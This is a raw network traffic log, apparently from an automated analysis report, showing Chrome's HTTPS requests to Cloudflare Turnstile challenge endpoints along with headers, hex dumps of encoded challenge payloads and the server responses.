                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 26586
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: _gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:45 UTC16384OUTData Raw: 76 5f 38 64 39 63 36 38 61 63 30 66 36 38 65 37 39 61 3d 44 38 42 63 75 62 31 58 52 65 42 31 38 6b 47 4a 5a 31 75 66 24 59 65 31 37 66 74 34 63 52 63 35 52 4a 64 66 36 66 42 61 4a 41 66 78 66 66 38 31 56 66 34 54 72 24 4b 74 63 66 68 42 66 49 63 4a 42 62 56 56 66 31 6f 61 66 36 63 59 44 41 36 65 66 66 74 66 32 75 75 63 31 64 48 44 42 48 65 66 77 63 59 6e 53 6b 5a 6b 66 31 74 66 31 25 32 62 38 31 78 66 42 42 66 57 66 42 52 78 42 5a 78 63 62 68 66 44 36 33 38 31 57 66 33 4d 32 72 32 73 66 6b 68 72 77 79 65 66 33 70 42 66 59 4d 4c 54 7a 37 62 72 53 72 66 36 66 50 4f 55 66 31 44 42 39 44 2b 65 63 66 4c 4d 7a 64 42 77 58 33 4c 41 59 50 2b 66 69 70 6e 36 66 66 30 54 56 36 35 2b 58 47 78 79 4a 72 30 41 58 47 6c 41 61 78 6c 6c 4b 37 73 39 53 47 42 64 4c 78 76 2b
                                                                                                                                                Data Ascii: v_8d9c68ac0f68e79a=D8Bcub1XReB18kGJZ1uf$Ye17ft4cRc5RJdf6fBaJAfxff81Vf4Tr$KtcfhBfIcJBbVVf1oaf6cYDA6efftf2uuc1dHDBHefwcYnSkZkf1tf1%2b81xfBBfWfBRxBZxcbhfD6381Wf3M2r2sfkhrwyef3pBfYMLTz7brSrf6fPOUf1DB9D+ecfLMzdBwX3LAYP+fipn6ff0TV65+XGxyJr0AXGlAaxllK7s9SGBdLxv+
                                                                                                                                                2024-10-28 16:47:45 UTC10202OUTData Raw: 66 31 7a 24 63 42 72 62 68 66 6f 31 78 63 75 66 4e 6f 6c 66 6b 74 62 73 37 6c 66 32 4b 6c 42 62 47 72 36 6f 51 52 75 2b 66 49 6d 73 6d 71 70 63 4e 63 44 66 6f 42 66 73 66 50 52 31 69 56 50 63 6c 73 62 33 66 57 63 44 72 31 6f 66 44 66 31 51 38 52 66 30 63 6b 4b 31 59 66 66 63 51 42 31 2b 66 62 68 6a 42 62 6c 66 6e 63 62 66 31 73 66 64 63 4a 52 31 39 66 6e 52 44 72 31 70 63 77 63 59 61 62 70 66 47 66 66 38 62 46 6b 6b 63 33 38 66 4c 68 6b 42 62 61 66 63 66 6a 66 31 7a 62 4f 66 69 63 4e 6e 57 70 63 54 66 66 61 31 57 51 39 4b 65 6f 4a 38 66 43 38 44 7a 39 32 72 43 66 51 72 62 78 47 62 66 42 34 66 76 66 6b 42 62 42 6b 74 31 4f 61 65 58 4a 4d 66 4c 66 51 42 65 32 72 78 66 5a 68 62 51 66 4f 61 33 35 31 73 72 78 66 67 5a 66 4b 73 57 38 59 52 59 58 66 46 66 33 74
                                                                                                                                                Data Ascii: f1z$cBrbhfo1xcufNolfktbs7lf2KlBbGr6oQRu+fImsmqpcNcDfoBfsfPR1iVPclsb3fWcDr1ofDf1Q8Rf0ckK1YffcQB1+fbhjBblfncbf1sfdcJR19fnRDr1pcwcYabpfGff8bFkkc38fLhkBbafcfjf1zbOficNnWpcTffa1WQ9KeoJ8fC8Dz92rCfQrbxGbfB4fvfkBbBkt1OaeXJMfLfQBe2rxfZhbQfOa351srxfgZfKsW8YRYXfFf3t
                                                                                                                                                2024-10-28 16:47:45 UTC334INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:45 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 22912
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: /i2OJ1IHZ/ZQ3XDstyiCfvllSj3UDF9wZogQN6ECWJ6Ak6MthRz8Y+wO5KLrWHNZJ77upNHZyPYl2tAvew==$+Brl8jl6vk2FJj2B
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68d3de9ee752-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:45 UTC1035INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6c 76 63 48 46 79 79 62 58 48 64 72 61 37 76 37 6d 2b 78 4d 6d 39 77 74 54 5a 67 71 43 45 78 74 6a 4f 33 64 62 50 32 65 44 67 79 5a 2f 4e 72 48 79 54 6c 4a 57 57 37 64 6e 72 6d 75 37 68 36 2b 4c 52 35 66 4c 33 36 50 66 35 70 73 53 6f 36 76 7a 79 41 76 72 7a 2f 51 55 46 37 63 54 78 30 4b 43 68 75 4c 6d 36 75 77 59 45 76 73 63 41 42 51 6b 44 43 41 34 54 42 77 77 65 49 39 6e 34 4a 69 4c 38 35 74 48 76 38 50 48 56 35 75 44 59 4e 63 54 46 33 4e 33 65 33 2b 44 68 34 75 4d 6b 4b 53 30 6e 4c 44 49 33 4b 7a 42 43 52 2b 38 4f 38 55 37 64 39 50 58
                                                                                                                                                Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudIlvcHFyybXHdra7v7m+xMm9wtTZgqCExtjO3dbP2eDgyZ/NrHyTlJWW7dnrmu7h6+LR5fL36Pf5psSo6vzyAvrz/QUF7cTx0KChuLm6uwYEvscABQkDCA4TBwweI9n4JiL85tHv8PHV5uDYNcTF3N3e3+Dh4uMkKS0nLDI3KzBCR+8O8U7d9PX
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 43 51 30 52 46 52 6b 64 49 65 59 4e 79 62 59 4e 65 61 56 43 6f 6d 36 47 59 70 4b 31 6c 6c 35 79 67 6d 70 2b 6c 71 70 36 76 73 62 5a 78 70 36 32 79 69 4c 69 79 77 4a 53 77 65 56 68 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 58 71 68 6f 62 58 42 31 5a 53 62 67 74 72 4e 30 38 72 57 33 35 66 4a 7a 74 4c 4d 30 64 66 63 30 4f 48 6a 36 4b 50 5a 33 2b 53 36 36 75 54 50 35 76 4c 6b 36 2b 62 37 72 34 36 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 44 69 39 2b 6f 44 44 63 62 52 75 42 45 45 43 67 45 4e 46 73 30 41 42 51 6b 44 43 41 34 54 42 78 67 61 48 39 6b 51 46 68 76 77 49 52 76 7a 46 79 6b 66 4a 69 62 6b 77 39 72 62 33 4e 33 65 33 2b 44 68 34 75 50 6b 35 51 6f 39 49 44 30 38 2f 51 66 74 52 6a 6b 2f 4e 6b 4a 4c 41 7a 55 36 50 6a 67 39 51 30 67 38 54 55 39 55 44 30
                                                                                                                                                Data Ascii: CQ0RFRkdIeYNybYNeaVCom6GYpK1ll5ygmp+lqp6vsbZxp62yiLiywJSweVhvcHFyc3R1dnd4eXqhobXB1ZSbgtrN08rW35fJztLM0dfc0OHj6KPZ3+S66uTP5vLk6+b7r46lpqeoqaqrrK2ur7Di9+oDDcbRuBEECgENFs0ABQkDCA4TBxgaH9kQFhvwIRvzFykfJibkw9rb3N3e3+Dh4uPk5Qo9ID08/QftRjk/NkJLAzU6Pjg9Q0g8TU9UD0
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 53 55 70 4c 54 45 31 4f 54 31 43 42 69 58 75 72 61 33 42 58 72 36 4b 6f 6e 36 75 30 62 4a 36 6a 70 36 47 6d 72 4c 47 6c 74 72 69 39 65 4a 76 46 6c 37 6d 42 63 48 35 79 79 72 33 44 75 73 62 50 68 37 6d 2b 77 72 7a 42 78 38 7a 41 30 64 50 59 6b 37 37 57 76 74 79 75 6f 5a 68 33 6a 6f 2b 51 6b 5a 4b 54 6c 4a 57 57 6c 35 69 5a 33 74 4c 4a 34 75 65 33 75 71 48 35 37 50 4c 70 39 66 36 32 36 4f 33 78 36 2f 44 32 2b 2b 38 42 41 77 6a 43 2b 65 33 6b 2f 51 50 53 78 36 61 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 67 69 38 52 38 45 34 65 6a 50 4b 42 73 68 47 43 51 74 35 42 63 63 49 42 6f 66 4a 53 6f 65 4c 7a 45 32 38 44 77 4d 4f 52 37 37 39 4e 50 71 36 2b 7a 74 37 75 2f 77 38 56 41 50 33 74 2f 32 39 2f 6a 35 2b 76 76 38 2f 56 56 42 55 77 4a 4a 56 6c 52 54 4b 6c 42
                                                                                                                                                Data Ascii: SUpLTE1OT1CBiXura3BXr6Kon6u0bJ6jp6GmrLGltri9eJvFl7mBcH5yyr3DusbPh7m+wrzBx8zA0dPYk77WvtyuoZh3jo+QkZKTlJWWl5iZ3tLJ4ue3uqH57PLp9f626O3x6/D2++8BAwjC+e3k/QPSx6a9vr/AwcLDxMXGx8gi8R8E4ejPKBshGCQt5BccIBofJSoeLzE28DwMOR779NPq6+zt7u/w8VAP3t/29/j5+vv8/VVBUwJJVlRTKlB
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 31 42 52 55 6c 6c 61 56 5a 71 6d 6d 36 36 6e 6f 4b 71 78 62 4b 47 76 70 62 74 78 72 62 4f 30 72 4c 71 52 6e 70 69 59 62 59 75 4d 6a 58 46 35 72 38 4a 38 59 48 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 6d 4b 68 63 72 57 79 39 37 58 30 4e 72 68 6e 4e 66 56 30 74 61 68 31 2b 54 6a 35 39 6e 72 33 37 2f 72 34 50 50 73 35 65 2f 32 30 2f 50 34 37 2f 76 78 2b 50 69 7a 38 50 7a 78 42 66 33 32 41 51 6a 43 39 77 62 37 45 73 4b 6b 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 7a 63 37 4a 49 68 55 62 45 68 34 6e 33 68 45 57 47 68 51 5a 48 79 51 59 4b 53 73 77 36 69 59 5a 47 42 55 35 2b 66 45 32 4f 79 77 36 51 68 30 77 4f 44 49 78 51 7a 39 44 2b 66 6c 48 53 55 39 44 50 51 41 44 43 54 39 4d 53 30 39 42 55 30 63 6e 55 30 68 62 56 45 31 58 58 6a 74 62 59 46 64 6a
                                                                                                                                                Data Ascii: 1BRUllaVZqmm66noKqxbKGvpbtxrbO0rLqRnpiYbYuMjXF5r8J8YHd4eXp7fH1+f4CBgomKhcrWy97X0NrhnNfV0tah1+Tj59nr37/r4PPs5e/20/P47/vx+Piz8PzxBf32AQjC9wb7EsKku7y9vr/AwcLDxMXGzc7JIhUbEh4n3hEWGhQZHyQYKSsw6iYZGBU5+fE2Oyw6Qh0wODIxQz9D+flHSU9DPQADCT9MS09BU0cnU0hbVE1XXjtbYFdj
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 32 67 70 70 32 70 73 6d 71 63 6f 61 57 66 70 4b 71 76 6f 37 53 32 75 33 61 78 70 4b 4f 67 78 49 56 39 77 63 61 33 78 63 32 6f 75 38 4f 39 76 4d 37 4b 7a 6f 57 46 77 38 6e 58 69 59 79 4e 68 59 79 48 6b 4c 66 5a 7a 39 47 62 73 72 36 7a 78 72 2b 34 77 73 6e 56 78 38 66 4d 77 38 2f 46 7a 4d 7a 65 78 4d 72 56 78 74 50 54 31 4d 7a 4c 33 63 2f 50 72 41 71 75 33 51 44 31 39 38 48 59 35 4e 6e 73 35 64 37 6f 37 2f 76 74 37 66 4c 70 39 65 76 79 38 67 58 73 39 76 54 31 2b 51 50 31 2b 2f 58 50 4c 64 45 42 49 78 6b 62 35 50 73 49 2f 42 41 4a 41 67 77 54 48 78 45 52 46 67 30 5a 44 78 59 57 4b 42 4d 59 48 42 6b 54 48 42 55 66 4a 68 51 6f 48 69 55 6c 4e 79 77 71 49 42 38 6d 4a 43 67 6a 43 75 73 44 42 41 55 47 42 77 67 4a 43 6b 67 56 4b 50 63 50 45 42 45 53 63 50 33 2b 46
                                                                                                                                                Data Ascii: 2gpp2psmqcoaWfpKqvo7S2u3axpKOgxIV9wca3xc2ou8O9vM7KzoWFw8nXiYyNhYyHkLfZz9Gbsr6zxr+4wsnVx8fMw8/FzMzexMrVxtPT1MzL3c/PrAqu3QD198HY5Nns5d7o7/vt7fLp9evy8gXs9vT1+QP1+/XPLdEBIxkb5PsI/BAJAgwTHxERFg0ZDxYWKBMYHBkTHBUfJhQoHiUlNywqIB8mJCgjCusDBAUGBwgJCkgVKPcPEBEScP3+F
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 64 58 6c 39 67 59 57 4a 6a 5a 47 57 39 73 4c 61 74 75 63 4a 36 76 62 2b 66 75 71 75 48 65 33 32 51 59 48 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 59 62 6b 6c 49 6d 62 6d 35 79 64 6c 36 70 36 6b 5a 4b 54 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 2b 75 50 72 38 2b 62 39 6a 61 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 50 33 2f 66 6b 4d 45 66 54 42 42 39 33 72 37 39 4c 48 2f 73 4c 67 78 4e 6e 68 73 63 6a 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 31 74 63 63 49 68 34 77 4e 52 6e 6c 45 6a 63 53 45 41 62 36 37 43 54 76 38 64 50 71 36 2b 7a 74 37 75 2f 77 38 66 4c 7a 39 50 56 55 34 66 6a 35 2b 76 76 38 2f 66 34 41 41 51 49 44 42 45 70 63 54 46 5a 64 47 46 74 65 55 6d 52 55 58 6d 55 32 57 46 70 57 61 32 4e 73 49 53 4d 32 42 68
                                                                                                                                                Data Ascii: dXl9gYWJjZGW9sLatucJ6vb+fuquHe32QYHd4eXp7fH1+f4CBgoOEhYbklImbm5ydl6p6kZKTlJWWl5iZmpuc+uPr8+b9jaSlpqeoqaqrrK2ur7CxsrP3/fkMEfTBB93r79LH/sLgxNnhscjJysvMzc7P0NHS09TV1tccIh4wNRnlEjcSEAb67CTv8dPq6+zt7u/w8fLz9PVU4fj5+vv8/f4AAQIDBEpcTFZdGFteUmRUXmU2WFpWa2NsISM2Bh
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 74 36 70 6d 77 6c 4a 70 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 54 4c 74 38 6c 34 76 73 7a 4e 79 38 2b 6e 7a 63 62 51 73 63 58 4f 79 73 6e 62 69 4b 61 4b 35 6e 61 4e 6a 6f 2b 51 6b 5a 4b 54 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 36 76 48 6d 75 71 48 76 39 75 75 78 6b 4b 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 4f 30 74 62 59 4e 43 77 62 55 75 78 49 51 43 38 75 71 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 73 76 4d 7a 63 37 50 30 42 34 63 49 68 6f 45 4a 76 48 59 4a 69 51 71 49 67 77 75 36 38 72 68 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 37 75 2f 77 4e 55 4a 41 53 6b 4e 46 4a 6b 67 55 2b 6a 39 4d 53 6c 52 4e 54 7a 42 53 45 4f 34 47 42 77 67 4a 43 67 73 4d 44 51 34 50 45 42 45 53 45 78 51 56 57 32 6c 71 61 47 77 31 48 47 4a 77 63 57 39 7a 44 43 4d
                                                                                                                                                Data Ascii: t6pmwlJpamtsbW5vcHFyc3TLt8l4vszNy8+nzcbQscXOysnbiKaK5naNjo+QkZKTlJWWl5iZmpuc6vHmuqHv9uuxkKeoqaqrrK2ur7CxsrO0tbYNCwbUuxIQC8uqwcLDxMXGx8jJysvMzc7P0B4cIhoEJvHYJiQqIgwu68rh4uPk5ebn6Onq6+zt7u/wNUJASkNFJkgU+j9MSlRNTzBSEO4GBwgJCgsMDQ4PEBESExQVW2lqaGw1HGJwcW9zDCM
                                                                                                                                                2024-10-28 16:47:45 UTC1369INData Raw: 37 6d 76 77 62 65 2b 76 6e 6c 37 63 38 39 66 59 48 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 73 7a 4b 68 59 37 47 77 38 6a 46 6e 4d 6e 4b 6a 70 43 74 72 70 4b 61 79 4e 62 42 78 66 4c 4f 34 4e 57 6a 6e 61 53 6c 6f 4f 44 64 34 74 2b 32 34 2b 53 6f 71 73 66 49 72 4c 51 41 43 74 34 49 32 2b 4c 4d 76 4c 2b 33 46 4b 4f 36 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 48 52 45 68 49 79 45 65 36 37 76 53 30 39 54 56 31 74 66 59 32 64 72 62 33 4e 30 38 79 65 44 68 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 7a 41 32 4f 7a 4e 46 53 69 37 36 4a 30 77 6e 4a 52 73 51 41 6a 6e 38 47 2f 35 56 54 30 5a 49 53 6b 35 55 54 45 77 6b 38 77 73 4d 44 51 34 50 45 42 45 53 45 78 51 56 46 6d 42 65 47 53 4a 65 5a 47 6c 68 63 33 68 63 4b 57 35 46 55 31 63 36 4c 32 59 71
                                                                                                                                                Data Ascii: 7mvwbe+vnl7c89fYHd4eXp7fH1+f4CBgszKhY7Gw8jFnMnKjpCtrpKayNbBxfLO4NWjnaSloODd4t+24+SoqsfIrLQACt4I2+LMvL+3FKO6u7y9vr/AwcLDxMXGx8jJHREhIyEe67vS09TV1tfY2drb3N08yeDh4uPk5ebn6Onq6zA2OzNFSi76J0wnJRsQAjn8G/5VT0ZISk5UTEwk8wsMDQ4PEBESExQVFmBeGSJeZGlhc3hcKW5FU1c6L2Yq


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                27192.168.2.1649753104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:46 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:46 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:46 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                cf-chl-out: +WKxFlpPqvVpA2lsd5/Ku1ncHjus8cF2YPw=$xFBktjAo3MOOSEH6
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68da997f6bf6-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:46 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                28192.168.2.1649754104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:52 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 28582
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: _gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:52 UTC16384OUTData Raw: 76 5f 38 64 39 63 36 38 61 63 30 66 36 38 65 37 39 61 3d 44 38 42 63 75 62 31 58 52 65 42 31 38 6b 47 4a 5a 31 75 66 24 59 65 31 37 66 74 34 63 52 63 35 52 4a 64 66 36 66 42 61 4a 41 66 78 66 66 38 31 56 66 34 54 72 24 4b 74 63 66 68 42 66 49 63 4a 42 62 56 56 66 31 6f 61 66 36 63 59 44 41 36 65 66 66 74 66 32 75 75 63 31 64 48 44 42 48 65 66 77 63 59 6e 53 6b 5a 6b 66 31 74 66 31 25 32 62 38 31 78 66 42 42 66 57 66 42 52 78 42 5a 78 63 62 68 66 44 36 33 38 31 57 66 33 4d 32 72 32 73 66 6b 68 72 77 79 65 66 33 70 42 66 59 4d 4c 54 7a 37 62 72 53 72 66 36 66 50 4f 55 66 31 44 42 39 44 2b 65 63 66 4c 4d 7a 64 42 77 58 33 4c 41 59 50 2b 66 69 70 6e 36 66 66 30 54 56 36 35 2b 58 47 78 79 4a 72 30 41 58 47 6c 41 61 78 6c 6c 4b 37 73 39 53 47 42 64 4c 78 76 2b
                                                                                                                                                Data Ascii: v_8d9c68ac0f68e79a=D8Bcub1XReB18kGJZ1uf$Ye17ft4cRc5RJdf6fBaJAfxff81Vf4Tr$KtcfhBfIcJBbVVf1oaf6cYDA6efftf2uuc1dHDBHefwcYnSkZkf1tf1%2b81xfBBfWfBRxBZxcbhfD6381Wf3M2r2sfkhrwyef3pBfYMLTz7brSrf6fPOUf1DB9D+ecfLMzdBwX3LAYP+fipn6ff0TV65+XGxyJr0AXGlAaxllK7s9SGBdLxv+
                                                                                                                                                2024-10-28 16:47:52 UTC12198OUTData Raw: 66 31 7a 24 63 42 72 62 68 66 6f 31 78 63 75 66 4e 6f 6c 66 6b 74 62 73 37 6c 66 32 4b 6c 42 62 47 72 36 6f 51 52 75 2b 66 49 6d 73 6d 71 70 63 4e 63 44 66 6f 42 66 73 66 50 52 31 69 56 50 63 6c 73 62 33 66 57 63 44 72 31 6f 66 44 66 31 51 38 52 66 30 63 6b 4b 31 59 66 66 63 51 42 31 2b 66 62 68 6a 42 62 6c 66 6e 63 62 66 31 73 66 64 63 4a 52 31 39 66 6e 52 44 72 31 70 63 77 63 59 61 62 70 66 47 66 66 38 62 46 6b 6b 63 33 38 66 4c 68 6b 42 62 61 66 63 66 6a 66 31 7a 62 4f 66 69 63 4e 6e 57 70 63 54 66 66 61 31 57 51 39 4b 65 6f 4a 38 66 43 38 44 7a 39 32 72 43 66 51 72 62 78 47 62 66 42 34 66 76 66 6b 42 62 42 6b 74 31 4f 61 65 58 4a 4d 66 4c 66 51 42 65 32 72 78 66 5a 68 62 51 66 4f 61 33 35 31 73 72 78 66 67 5a 66 4b 73 57 38 59 52 59 58 66 46 66 33 74
                                                                                                                                                Data Ascii: f1z$cBrbhfo1xcufNolfktbs7lf2KlBbGr6oQRu+fImsmqpcNcDfoBfsfPR1iVPclsb3fWcDr1ofDf1Q8Rf0ckK1YffcQB1+fbhjBblfncbf1sfdcJR19fnRDr1pcwcYabpfGff8bFkkc38fLhkBbafcfjf1zbOficNnWpcTffa1WQ9KeoJ8fC8Dz92rCfQrbxGbfB4fvfkBbBkt1OaeXJMfLfQBe2rxfZhbQfOa351srxfgZfKsW8YRYXfFf3t
                                                                                                                                                2024-10-28 16:47:52 UTC286INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:52 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Content-Length: 4140
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-out: xgHAsRG5fz83bh8APe6AeECPk+dVtfnr1GbQvsohiVcKmXGuQm9DkbfHa6z7+KCKH8bA10+RYeapwlX1gSFsMaMqndz4+SKdg1V5rJd2vB5IiicataIlUG8u$iwQJ8sg+j2Xxk1CC
                                                                                                                                                2024-10-28 16:47:52 UTC1247INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 4a 76 52 55 5a 4f 59 41 6e 6c 6d 2b 33 52 56 50 31 44 4a 39 73 54 6c 69 75 46 66 58 37 70 63 65 56 33 6f 63 70 46 2b 33 57 71 35 71 52 50 73 66 4b 30 7a 2f 4a 61 37 58 78 53 4b 70 52 4e 43 75 4a 63 44 53 62 52 65 58 63 45 31 62 54 48 42 72 58 52 31 39 73 62 6e 43 42 72 65 31 6d 50 4d 79 31 58 59 49 61 58 61 56 51 65 2b 6f 4e 42 5a 75 76 4a 73 6a 2b 38 4e 50 6f 77 53 6a 39 45 64 35 4d 66 32 56 62 74 35 33 39 78 53 73 36 33 6e 42 7a 48 49 62 66 41 73 43 36 32 31 48 53 6a 76 44 2b 4a 30 72 33 53 47 50 78 6e 6a 7a 31 6e 6f 34 75 73 31 77 4a 34 48 37 55 6b 70 6d 6f 55 70 54 6c 65 2b 53 75 2b 49 33 41 72 61 45 69 2b 38 4c 49 34 62 51 75 31 72 68 57 4f 48 44 58 68 48 6b 47 70 4d 61 47 2b 6d 6a 4d 4f 79 4e 49 6b 43 48 2f
                                                                                                                                                Data Ascii: cf-chl-out-s: JvRUZOYAnlm+3RVP1DJ9sTliuFfX7pceV3ocpF+3Wq5qRPsfK0z/Ja7XxSKpRNCuJcDSbReXcE1bTHBrXR19sbnCBre1mPMy1XYIaXaVQe+oNBZuvJsj+8NPowSj9Ed5Mf2Vbt539xSs63nBzHIbfAsC621HSjvD+J0r3SGPxnjz1no4us1wJ4H7UkpmoUpTle+Su+I3AraEi+8LI4bQu1rhWOHDXhHkGpMaG+mjMOyNIkCH/
